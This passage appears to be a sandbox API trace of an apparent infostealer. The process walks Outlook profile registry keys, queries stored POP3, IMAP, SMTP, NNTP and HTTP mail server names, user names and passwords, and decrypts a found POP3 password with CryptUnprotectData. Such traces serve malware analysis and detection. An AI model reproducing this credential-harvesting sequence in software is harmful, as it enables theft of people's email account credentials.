0x5cc968 [0115.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.190] SHQueryValueExW (in: hkey=0x208, pszValue="NNTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.190] GetProcessHeap () returned 0x5b0000 [0115.191] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.205] GetProcessHeap () returned 0x5b0000 [0115.205] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.206] SHQueryValueExW (in: hkey=0x208, pszValue="IMAP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.206] GetProcessHeap () returned 0x5b0000 [0115.207] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.207] GetProcessHeap () returned 0x5b0000 [0115.207] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.208] SHQueryValueExW (in: hkey=0x208, pszValue="IMAP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.208] GetProcessHeap () returned 0x5b0000 [0115.208] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.208] GetProcessHeap () returned 0x5b0000 [0115.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.209] SHQueryValueExW (in: hkey=0x208, pszValue="IMAP User", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.209] GetProcessHeap () returned 0x5b0000 [0115.210] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.210] GetProcessHeap () returned 0x5b0000 [0115.210] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.210] SHQueryValueExW (in: hkey=0x208, pszValue="HTTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.210] GetProcessHeap () returned 0x5b0000 [0115.211] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.211] GetProcessHeap () returned 0x5b0000 [0115.211] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.212] SHQueryValueExW (in: hkey=0x208, pszValue="HTTP Server URL", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.212] GetProcessHeap () returned 0x5b0000 [0115.212] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.212] GetProcessHeap () returned 0x5b0000 [0115.212] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.213] SHQueryValueExW (in: hkey=0x208, pszValue="HTTPMail User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.213] GetProcessHeap () returned 0x5b0000 [0115.213] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.213] GetProcessHeap () returned 0x5b0000 [0115.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.214] SHQueryValueExW (in: hkey=0x208, pszValue="HTTPMail Server", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.214] GetProcessHeap () returned 0x5b0000 [0115.214] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.215] SHQueryValueExW (in: hkey=0x208, pszValue="POP3 Port", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0xdf6b8, pcbData=0xdf6b4*=0x4 | out: pdwType=0xdf6b0*=0x0, pvData=0xdf6b8, pcbData=0xdf6b4*=0x4) returned 0x2 [0115.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.216] SHQueryValueExW (in: hkey=0x208, pszValue="SMTP Port", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0xdf6b8, pcbData=0xdf6b4*=0x4 | out: pdwType=0xdf6b0*=0x0, pvData=0xdf6b8, pcbData=0xdf6b4*=0x4) returned 0x2 [0115.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.217] SHQueryValueExW (in: hkey=0x208, pszValue="IMAP Port", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0xdf6b8, pcbData=0xdf6b4*=0x4 | out: pdwType=0xdf6b0*=0x0, pvData=0xdf6b8, pcbData=0xdf6b4*=0x4) returned 0x2 [0115.217] GetProcessHeap () returned 0x5b0000 [0115.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.217] SHQueryValueExW (in: hkey=0x208, pszValue="POP3 Password2", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208) returned 0x2 [0115.217] GetProcessHeap () returned 0x5b0000 [0115.218] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0115.218] GetProcessHeap () returned 0x5b0000 [0115.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.218] SHQueryValueExW (in: hkey=0x208, pszValue="IMAP Password2", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208) returned 0x2 [0115.218] GetProcessHeap () returned 0x5b0000 [0115.218] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0115.218] GetProcessHeap () returned 0x5b0000 [0115.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.219] SHQueryValueExW (in: hkey=0x208, pszValue="NNTP Password2", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208) returned 0x2 [0115.219] GetProcessHeap () returned 0x5b0000 [0115.219] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0115.219] GetProcessHeap () returned 0x5b0000 [0115.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.220] SHQueryValueExW (in: hkey=0x208, pszValue="HTTPMail Password2", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208) returned 0x2 [0115.220] GetProcessHeap () returned 0x5b0000 [0115.220] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0115.220] GetProcessHeap () returned 0x5b0000 [0115.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.221] SHQueryValueExW (in: hkey=0x208, pszValue="SMTP Password2", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208) returned 0x2 [0115.221] GetProcessHeap () returned 0x5b0000 [0115.221] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0115.221] GetProcessHeap () returned 0x5b0000 [0115.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.222] SHQueryValueExW (in: hkey=0x208, pszValue="POP3 Password", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5caba0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x3, pvData=0x5caba0*, pcbData=0xdf6b4*=0x121) returned 0x0 [0115.223] LoadLibraryW (lpLibFileName="CRYPT32") returned 0x73f90000 [0116.308] CryptUnprotectData (in: pDataIn=0xdf6ac, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x1, pDataOut=0xdf6b4 | out: ppszDataDescr=0x0, pDataOut=0xdf6b4) returned 1 [0116.332] GetProcessHeap () returned 0x5b0000 [0116.332] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x26) returned 0x5c86b0 [0116.333] LocalFree (hMem=0x5be248) returned 0x0 [0116.333] GetProcessHeap () returned 0x5b0000 [0116.334] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0116.334] GetProcessHeap () returned 0x5b0000 [0116.334] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caba0 | out: hHeap=0x5b0000) returned 1 [0116.334] GetProcessHeap () returned 0x5b0000 [0116.334] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.335] SHQueryValueExW (in: hkey=0x208, pszValue="IMAP Password", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5cc9f0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5cc9f0, pcbData=0xdf6b4*=0x208) returned 0x2 [0116.335] GetProcessHeap () returned 0x5b0000 [0116.335] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.335] GetProcessHeap () returned 0x5b0000 [0116.335] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.336] SHQueryValueExW (in: hkey=0x208, pszValue="NNTP Password", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5cc9f0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5cc9f0, pcbData=0xdf6b4*=0x208) returned 0x2 [0116.336] GetProcessHeap () returned 0x5b0000 [0116.337] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.337] GetProcessHeap () returned 0x5b0000 [0116.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.338] SHQueryValueExW (in: hkey=0x208, pszValue="HTTP Password", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5cc9f0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5cc9f0, pcbData=0xdf6b4*=0x208) returned 0x2 [0116.338] GetProcessHeap () returned 0x5b0000 [0116.338] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.338] GetProcessHeap () returned 0x5b0000 [0116.338] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5cc9f0 [0116.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.339] SHQueryValueExW (in: hkey=0x208, pszValue="SMTP Password", pdwReserved=0x0, pdwType=0xdf6b0, pvData=0x5cc9f0, pcbData=0xdf6b4*=0x208 | out: pdwType=0xdf6b0*=0x0, pvData=0x5cc9f0, pcbData=0xdf6b4*=0x208) returned 0x2 [0116.339] GetProcessHeap () returned 0x5b0000 [0116.339] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc9f0 | out: hHeap=0x5b0000) returned 1 [0116.339] GetProcessHeap () returned 0x5b0000 [0116.340] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc550 | out: hHeap=0x5b0000) returned 1 [0116.340] GetProcessHeap () returned 0x5b0000 [0116.340] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.340] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.341] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdfb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned 97 [0116.341] GetProcessHeap () returned 0x5b0000 [0116.341] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc6) returned 0x5bf868 [0116.341] GetProcessHeap () returned 0x5b0000 [0116.342] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.342] GetProcessHeap () returned 0x5b0000 [0116.342] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa00 [0116.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.343] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", phkResult=0x5caa00 | out: phkResult=0x5caa00*=0x218) returned 0x0 [0116.343] GetProcessHeap () returned 0x5b0000 [0116.343] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc550 [0116.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.374] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x0, pszName=0x5cc550, pcchName=0xdfb1c | out: pszName="", pcchName=0xdfb1c) returned 0x103 [0116.374] GetProcessHeap () returned 0x5b0000 [0116.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc550 | out: hHeap=0x5b0000) returned 1 [0116.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.376] RegCloseKey (hKey=0x218) returned 0x0 [0116.376] GetProcessHeap () returned 0x5b0000 [0116.376] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0116.376] GetProcessHeap () returned 0x5b0000 [0116.377] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bf868 | out: hHeap=0x5b0000) returned 1 [0116.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.391] RegCloseKey (hKey=0x208) returned 0x0 [0116.391] GetProcessHeap () returned 0x5b0000 [0116.391] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0116.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.392] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x2, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="00000003", pcchName=0xdfb4c) returned 0x0 [0116.392] GetProcessHeap () returned 0x5b0000 [0116.392] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa50 [0116.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.393] RegOpenKeyW (in: hKey=0x1f0, lpSubKey="00000003", phkResult=0x5caa50 | out: phkResult=0x5caa50*=0x208) returned 0x0 [0116.393] GetProcessHeap () returned 0x5b0000 [0116.393] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc550 [0116.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.394] SHQueryValueExW (in: hkey=0x208, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc550, pcbData=0xdf6c0*=0x208 | out: pdwType=0x0, pvData=0x5cc550, pcbData=0xdf6c0*=0x208) returned 0x2 [0116.394] GetProcessHeap () returned 0x5b0000 [0116.395] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc550 | out: hHeap=0x5b0000) returned 1 [0116.395] GetProcessHeap () returned 0x5b0000 [0116.395] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.396] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.397] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdfb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned 97 [0116.397] GetProcessHeap () returned 0x5b0000 [0116.397] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc6) returned 0x5bfba8 [0116.397] GetProcessHeap () returned 0x5b0000 [0116.397] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.397] GetProcessHeap () returned 0x5b0000 [0116.397] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca930 [0116.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.398] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", phkResult=0x5ca930 | out: phkResult=0x5ca930*=0x218) returned 0x0 [0116.399] GetProcessHeap () returned 0x5b0000 [0116.399] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc550 [0116.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.399] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x0, pszName=0x5cc550, pcchName=0xdfb1c | out: pszName="", pcchName=0xdfb1c) returned 0x103 [0116.400] GetProcessHeap () returned 0x5b0000 [0116.400] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc550 | out: hHeap=0x5b0000) returned 1 [0116.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.401] RegCloseKey (hKey=0x218) returned 0x0 [0116.401] GetProcessHeap () returned 0x5b0000 [0116.401] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca930 | out: hHeap=0x5b0000) returned 1 [0116.401] GetProcessHeap () returned 0x5b0000 [0116.402] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bfba8 | out: hHeap=0x5b0000) returned 1 [0116.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.403] RegCloseKey (hKey=0x208) returned 0x0 [0116.403] GetProcessHeap () returned 0x5b0000 [0116.403] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa50 | out: hHeap=0x5b0000) returned 1 [0116.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.404] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x3, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0116.404] GetProcessHeap () returned 0x5b0000 [0116.404] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.406] RegCloseKey (hKey=0x1f0) returned 0x0 [0116.406] GetProcessHeap () returned 0x5b0000 [0116.406] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0116.409] GetProcessHeap () returned 0x5b0000 [0116.410] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.411] RegCloseKey (hKey=0x1fc) returned 0x0 [0116.411] GetProcessHeap () returned 0x5b0000 [0116.411] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca900 | out: hHeap=0x5b0000) returned 1 [0116.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.412] SHEnumKeyExW (in: hkey=0x204, dwIndex=0xa, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="dc48e7c6d33441458035ee20beefe18a", pcchName=0xdfb7c) returned 0x0 [0116.412] GetProcessHeap () returned 0x5b0000 [0116.412] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa40 [0116.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.413] RegOpenKeyW (in: hKey=0x204, lpSubKey="dc48e7c6d33441458035ee20beefe18a", phkResult=0x5caa40 | out: phkResult=0x5caa40*=0x1fc) returned 0x0 [0116.413] GetProcessHeap () returned 0x5b0000 [0116.413] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0116.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.414] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0116.414] GetProcessHeap () returned 0x5b0000 [0116.415] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.415] GetProcessHeap () returned 0x5b0000 [0116.415] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.416] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.416] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a") returned 88 [0116.416] GetProcessHeap () returned 0x5b0000 [0116.416] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0116.416] GetProcessHeap () returned 0x5b0000 [0116.417] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.417] GetProcessHeap () returned 0x5b0000 [0116.417] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0116.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.418] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\dc48e7c6d33441458035ee20beefe18a", phkResult=0x5ca9f0 | out: phkResult=0x5ca9f0*=0x1f0) returned 0x0 [0116.418] GetProcessHeap () returned 0x5b0000 [0116.418] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0116.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.419] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0116.419] GetProcessHeap () returned 0x5b0000 [0116.420] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.421] RegCloseKey (hKey=0x1f0) returned 0x0 [0116.421] GetProcessHeap () returned 0x5b0000 [0116.421] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9f0 | out: hHeap=0x5b0000) returned 1 [0116.421] GetProcessHeap () returned 0x5b0000 [0116.422] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0116.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.430] RegCloseKey (hKey=0x1fc) returned 0x0 [0116.430] GetProcessHeap () returned 0x5b0000 [0116.430] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa40 | out: hHeap=0x5b0000) returned 1 [0116.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.431] SHEnumKeyExW (in: hkey=0x204, dwIndex=0xb, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="e57f6d0b27b6134693ca7113a4ab34a6", pcchName=0xdfb7c) returned 0x0 [0116.431] GetProcessHeap () returned 0x5b0000 [0116.431] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca930 [0116.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.432] RegOpenKeyW (in: hKey=0x204, lpSubKey="e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x5ca930 | out: phkResult=0x5ca930*=0x1fc) returned 0x0 [0116.432] GetProcessHeap () returned 0x5b0000 [0116.432] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0116.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.433] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0116.433] GetProcessHeap () returned 0x5b0000 [0116.434] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.434] GetProcessHeap () returned 0x5b0000 [0116.434] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5ccd70 [0116.434] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0116.435] wvsprintfW (in: param_1=0x5ccd70, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6") returned 88 [0116.435] GetProcessHeap () returned 0x5b0000 [0116.435] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0116.435] GetProcessHeap () returned 0x5b0000 [0116.436] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccd70 | out: hHeap=0x5b0000) returned 1 [0116.436] GetProcessHeap () returned 0x5b0000 [0116.436] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca920 [0116.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0116.437] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x5ca920 | out: phkResult=0x5ca920*=0x1f0) returned 0x0 [0116.438] GetProcessHeap () returned 0x5b0000 [0116.438] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0116.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0116.441] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0116.441] GetProcessHeap () returned 0x5b0000 [0116.441] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0116.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 